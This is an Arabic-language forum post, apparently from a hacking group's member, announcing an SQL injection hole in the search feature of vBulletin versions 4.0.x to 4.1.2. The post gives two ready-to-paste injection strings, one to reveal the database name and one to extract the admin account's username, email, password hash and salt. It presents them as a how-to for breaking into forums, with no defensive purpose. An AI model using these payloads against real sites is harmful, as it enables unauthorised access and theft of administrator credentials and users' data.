عرض مشاركة واحدة
قديم 05-22-2011, 05:12 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي vBulletin 4.0.x => 4.1.2 SQL Injection Vulnerability


السلام عليكم ورحمه الله وبركاته


الموضوع واضح من العنوان ثغره في المنتديات اصدار 4 لحتى اصدار 4.1.2

الثغره بمحرك البحث

نروح محرك البحث ونكتب استعلام الحقن


اقتباس
&cat[0]=1) UNION SELECT database()#

يظهر لنا الداتابيز
وهيك نجيب باس الادمن

اقتباس
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#


وهذا فيديو شرح



مكتشف الثغره D4rkB1t

بالتوفيق


vBulletin 4>0>x => 4>1>2 SQL Injection Vulnerability

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس